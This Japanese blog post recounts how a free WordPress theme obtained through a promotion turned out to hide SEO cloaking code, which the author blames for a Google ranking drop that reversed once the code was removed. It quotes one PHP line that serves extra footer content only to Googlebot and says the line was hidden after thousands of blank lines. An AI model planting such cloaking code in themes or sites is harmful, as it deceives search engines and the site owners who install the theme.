緊急報告・Google順位が下がった事件続報
Googleの順位が激落ちしてしまった事件で、真相っぽいものが判明したので、速報的にご報告。こんなこともあるのか!ということです。なんと…マルウェア的プラグインが、テーマに仕込まれていたんです…。
最初にお断り
以下、結構衝撃的なことが書かれていますが、読者の皆様にはなんら悪影響は出ていなかったことをまず宣言しておきます。安心して読んでください。
まさか…テーマにこんなものが仕込まれていたなんて
今回WordPressを導入するに当たり、テーマをどうするかが最大の課題でした。結局は海外の有名なテーマ配布サイト「ThemeJunkie」で制作されていたこの「Channel Pro」を使うことにしたのですが、このテーマの導入の方法が悪かったようなのです。
当時、このテーマを導入前に調べていると、「このキャンペーンに参加してつぶやくと、Channel Proテーマをプレゼント」というものがあったのですね。「おっ、タイミングいいね!」と思った僕は、まんまとそのキャンペーンに参加して、お目当てのテーマを無料で手に入れました。
ただ、そこは無料ということで、一応疑いました。テーマのマルウェアチェックツール(TAC)を使ってみたのですが、そこは特に問題無くクリアー。晴れて、このテーマを導入することになったのです。
みるみる落ちる検索順位
ところが、異変は導入後すぐに訪れました。Googleの検索での順位がどんどん落ちていき、ついにはGoogleに表示されるかされないか程度まで落ちてしまったのです。ブログ検索にも正常に表示されないなど、問題は深刻でした。その後、何度かご報告をしたように、301の設定やサイトマップのエラーをなおしながら、ここ1ヶ月対策を行ってきました。しかし、あまり成果は出なかったのです。
そこで僕は、Googleのウェブマスターフォーラムに相談することにしました。
Google社員の方が怪しい挙動を指摘してくれた
すると今日、とんでもないコメントがGoogle社員の方からフォーラムに上がってきました。
ご報告いただきました状況について確認しましたところ、https://airoplane.net/ 上のページが第三者によりハッキングされている可能性がありますのでご連絡いたします。
ぶっちゃけ、「えええええええ!!!!」と思いましたよ。しかしハッキングというのはちょっとだけ大げさで、実際のところはマルウェア的なものがどこかに仕込まれているのだろう、ということでした。
ここでいうマルウェアとは、Googleのクローラーが来た時だけ特殊なコンテンツを読ませるという、ちょっとセコくてあくどいプログラムのことです。(いわゆるクローキングですね)
そして衝撃のコメントから5時間ほど…ついに原因を突き止めました。なんと、無料でもらったテーマの1ファイルに、こんな記述があったのです。
$seo_plugin=get_option(“ranking");if (strstr($_SERVER['HTTP_USER_AGENT’], 'Googlebot’)) {add_action('wp_footer’, 'ranking’);}
これがGoogleやBing、Slurpなど、ボットごとにありました。何かといえば、ボットが来た時だけ別のコンテンツを追加して読ませるという、SEO目的なマルウェア的(クローキング)プラグインが載っていたのです!ちなみに有料版を買って比較して試したので、間違い有りません。当然ながら有料版にはありませんでした。
思えばプラグインだったので、ウェブマスターツールのマルウェアにも反応しなかったんですね。テーマのプラグインは全て把握できないため、それも盲点でした。これは指摘されなかったら最後まで気がつかなかったかも。
やり方は本当にせこくて、本来のファイルの末尾から3000行も改行で空けてこの記述が入っていました…おいおい。
ということで、どうやらあくどいクローキングプラグインを仕込まれ、そのせいで順位が下がっていた可能性が急浮上しました。そりゃそうだ、特定のサイトへのリンクが数万単位で発生したのだから。
ちなみに現在は対処したので、正しい挙動になっています。果たして検索状況、元に戻るかなあ。
WordPressでは無い話でもないらしい
調べてみると、悪質なテーマ、プラグインというのは少なからずあるようですね。動的生成の裏をかいた、迷惑なこの仕込み、これからWordPressを運用するにあたって、もう少し気をつけてみたいと思います。
Googleのほうはどうか元に戻りますように…。
(追記)翌日になって順位が戻ってきました。明らかに、このクローキングが影響していたようです。
